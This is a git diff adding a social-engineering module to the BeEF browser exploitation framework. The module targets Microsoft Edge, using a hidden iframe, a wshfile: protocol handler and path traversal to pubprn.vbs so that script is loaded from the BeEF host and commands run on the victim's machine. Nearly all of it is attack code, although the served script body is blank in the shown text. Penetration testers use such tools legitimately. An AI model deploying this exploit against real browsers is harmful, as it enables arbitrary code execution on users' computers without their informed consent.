diff --git a/modules/social_engineering/edge_wscript_wsh_injection/command.js b/modules/social_engineering/edge_wscript_wsh_injection/command.js
new file mode 100755
index 000000000..6d8c5e09b
--- /dev/null
+++ b/modules/social_engineering/edge_wscript_wsh_injection/command.js
@@ -0,0 +1,31 @@
+//
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function(){
+ var timeout = 5;
+
+ if (!beef.browser.isEdge()) {
+ beef.debug("[Edge WScript WSH Injection] Browser is not supported.");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.are.status_error());
+ return;
+ }
+
+ try {
+ var wsh_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+ var beef_host = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port;
+ wsh_iframe_<%= @command_id %>.setAttribute('src', 'wshfile:test/../../../../../../../Windows/System32/Printing_Admin_Scripts/en-US/pubprn.vbs" 127.0.0.1 script:' + beef_host + '/<%= @command_id %>/index.html');
+ } catch (e) {
+ beef.debug("[Edge WScript WSH Injection] Could not create iframe");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.are.status_error());
+ return;
+ }
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(wsh_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+});
diff --git a/modules/social_engineering/edge_wscript_wsh_injection/config.yaml b/modules/social_engineering/edge_wscript_wsh_injection/config.yaml
new file mode 100755
index 000000000..1f68fa559
--- /dev/null
+++ b/modules/social_engineering/edge_wscript_wsh_injection/config.yaml
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ edge_wscript_wsh_injection:
+ enable: true
+ category: ["Social Engineering"]
+ name: "Edge WScript WSH Injection"
+ description: "Prompts the user to run \"Microsoft Windows Based Script Host\" (WScript.exe).
Uses wshfile protocol handler technique to load pubprn.vbs and WSH injection in pubprn.vbs to execute arbitrary code.
If the user allows execution, a VBS payload is downloaded from BeEF, and the specified commands are executed."
+ authors: [
+ "@qab", # wshfile protocol handler + traversal technique, and exploit
+ "@enigma0x3", # pubprn.vbs technique and exploit
+ "bcoles" # BeEF
+ ]
+ target:
+ user_notify: ["E"]
+ not_working: ["ALL"]
diff --git a/modules/social_engineering/edge_wscript_wsh_injection/module.rb b/modules/social_engineering/edge_wscript_wsh_injection/module.rb
new file mode 100755
index 000000000..636bd1f7d
--- /dev/null
+++ b/modules/social_engineering/edge_wscript_wsh_injection/module.rb
@@ -0,0 +1,60 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Edge_wscript_wsh_injection < BeEF::Core::Command
+
+ def pre_send
+ payload = ''
+ @datastore.each do |input|
+ if input['name'] == 'payload'
+ payload = input['value']
+ end
+ end
+
+ rand_str = rand(32**10).to_s(32)
+
+ script = <<-EOF
+
+
+
+
+
+
+
+
+
+EOF
+
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
+ {
+ 'Content-Type' => 'text/html'
+ },
+ script,
+ "/#{@command_id}/index.html",
+ -1
+ )
+ end
+
+ def self.options
+ return [
+ {'name' => 'payload', 'ui_label' => 'Commands', 'value' => "calc.exe"}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html")
+ end
+end